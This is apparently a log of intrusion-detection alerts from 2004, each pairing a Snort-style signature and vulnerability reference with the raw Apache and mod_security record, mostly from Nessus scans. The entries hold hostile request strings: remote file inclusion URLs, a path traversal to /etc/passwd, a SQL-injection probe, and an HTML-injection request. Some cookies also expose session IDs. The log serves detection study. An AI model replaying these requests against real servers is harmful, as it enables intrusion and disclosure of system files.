2226 | BID7919 Nessus 11739 | web-application-attack | WEB-PHP pmachine remote command execution attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:44:37 2004] "GET /cgi-bin/lib.inc.php?pm_path=http://xxxxxxxx&sfx=.txt HTTP/1.1" 404 299 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/lib.inc.php ---------------------------------------- GET /cgi-bin/lib.inc.php?pm_path=http://xxxxxxxx&sfx=.txt HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2229 | BID7979 Nessus 11767 | web-application-attack | WEB-PHP viewtopic.php access | Request: 210.49.12.237 - - [Thu Mar 11 03:53:30 2004] "GET http://www.exovian.com/forum/viewtopic.php?t=18 HTTP/1.0" 200 25000 Handler: proxy-server ---------------------------------------- GET http://www.exovian.com/forum/viewtopic.php?t=18 HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-gsarcade-launch, */* Accept-Language: en-au Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2278b27329af91250c430f1f2892f0e3cc%22%3Bs%3A6%3A%22userid%22%3Bi%3A16%3B%7D; bbmode=normal; phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=470bafeaffd67803a8218bce2208cffa Host: www.exovian.com Proxy-Connection: Keep-Alive Referer: http://www.exovian.com/forum/viewforum.php?f=10&sid=470bafeaffd67803a8218bce2208cffa User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) HTTP/1.0 200 OK X-Powered-By: PHP/4.3.3 Cache-Control: private, pre-check=0, post-check=0, max-age=0 Expires: 0 Pragma: no-cache Content-Type: text/html X-Cache: MISS from www.testproxy.net Connection: close |
2231 | Nessus 11747 CAN-2001-0958 | web-application-activity | WEB-MISC register.dll access | Request: 217.160.165.173 - - [Fri Mar 12 22:46:03 2004] "GET /cgi-bin/register.dll HTTP/1.1" 404 300 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/register.dll ---------------------------------------- GET /cgi-bin/register.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2246 | Nessus 11771 | web-application-activity | WEB-MISC webadmin.dll access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:05 2004] "GET /cgi-bin/webadmin.dll HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/webadmin.dll ---------------------------------------- GET /cgi-bin/webadmin.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2303 | BID8890 | web-application-activity | WEB-PHP Advanced Poll popup.php access | Request: 203.77.209.35 - - [Thu Mar 11 04:38:19 2004] "GET http://www.ligabankmandiri.com/popup.php HTTP/1.0" 200 359 Handler: proxy-server ---------------------------------------- GET http://www.ligabankmandiri.com/popup.php HTTP/1.0 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-us Cookie: PHPSESSID=eaa093b3cfa1d89ccc6a52beb24c0f82 Host: www.ligabankmandiri.com Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) HTTP/1.0 200 OK X-Powered-By: PHP/4.1.2 Content-Type: text/html X-Cache: MISS from www.testproxy.net Connection: close |
2321 | Nessus 11939 | web-application-activity | WEB-IIS foxweb.exe access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:09 2004] "GET /cgi-bin/foxweb.exe HTTP/1.1" 404 298 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/foxweb.exe ---------------------------------------- GET /cgi-bin/foxweb.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2322 | Nessus 11939 | web-application-activity | WEB-IIS foxweb.dll access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:09 2004] "GET /cgi-bin/foxweb.dll HTTP/1.1" 404 298 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/foxweb.dll ---------------------------------------- GET /cgi-bin/foxweb.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2323 | BID9282 Nessus 11975 | web-application-activity | WEB-CGI quickstore.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:54 2004] "GET /cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2326 | CAN-2002-0375 BID4720 Nessus 11955 | web-application-activity | WEB-IIS sgdynamo.exe access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:27 2004] "GET /cgi-bin/sgdynamo.exe?HTNAME=sgdynamo.exe HTTP/1.1" 404 300 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/sgdynamo.exe ---------------------------------------- GET /cgi-bin/sgdynamo.exe?HTNAME=sgdynamo.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2328 | Nessus 11982 | web-application-activity | WEB-PHP authentication_index.php access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:40 2004] "GET /cgi-bin/authentication_index.php?PGV_BASE_DIRECTORY=http://xxxxxxx/ HTTP/1.1" 404 312 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/authentication_index.php ---------------------------------------- GET /cgi-bin/authentication_index.php?PGV_BASE_DIRECTORY=http://xxxxxxx/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2342 | BID6525 | web-application-attack | WEB-PHP DCP-Portal remote file include attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:39:50 2004] "GET /cgi-bin/library/lib.php?root=http://xxxxxxxxxxx HTTP/1.1" 403 307 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/library ---------------------------------------- GET /cgi-bin/library/lib.php?root=http://xxxxxxxxxxx HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2372 | BID9557 | web-application-activity | WEB-PHP Photopost PHP Pro showphoto.php access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:12 2004] "GET /cgi-bin/showphoto.php?photo=123' HTTP/1.1" 404 301 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/showphoto.php ---------------------------------------- GET /cgi-bin/showphoto.php?photo=123' HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2393 | Nessus 12032 BID9537 | web-application-activity | WEB-PHP /_admin access | Request: 217.160.165.173 - - [Fri Mar 12 22:43:00 2004] "GET /cgi-bin/_admin/ HTTP/1.1" 403 299 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/_admin ---------------------------------------- GET /cgi-bin/_admin/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
2394 | BID8014 | web-application-attack | WEB-MISC Compaq web-based management agent denial of service attempt | Request: 218.14.135.217 - - [Fri Mar 12 12:14:39 2004] "GET http://rextopia.com/track_lead/24/?height=1%20width=1%20border=0><!--end%20precisionplay--><!--ORB%20TRACKING--><IMG%20SRC= HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://rextopia.com/track_lead/24/?height=1%20width=1%20border=0><!--end%20precisionplay--><!--ORB%20TRACKING--><IMG%20SRC=] for 50000 ms ---------------------------------------- GET http://rextopia.com/track_lead/24/?height=1%20width=1%20border=0><!--end%20precisionplay--><!--ORB%20TRACKING--><IMG%20SRC= HTTP/1.0 Accept: */* Accept-Language: en-us Host: rextopia.com Proxy-~~~~~~~~~~: ~~~~~~~~~~ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) ~~~~~~~: ~~~~:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ mod_security-message: Access denied with code 200. Pattern match "<(.\|\n)+>" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |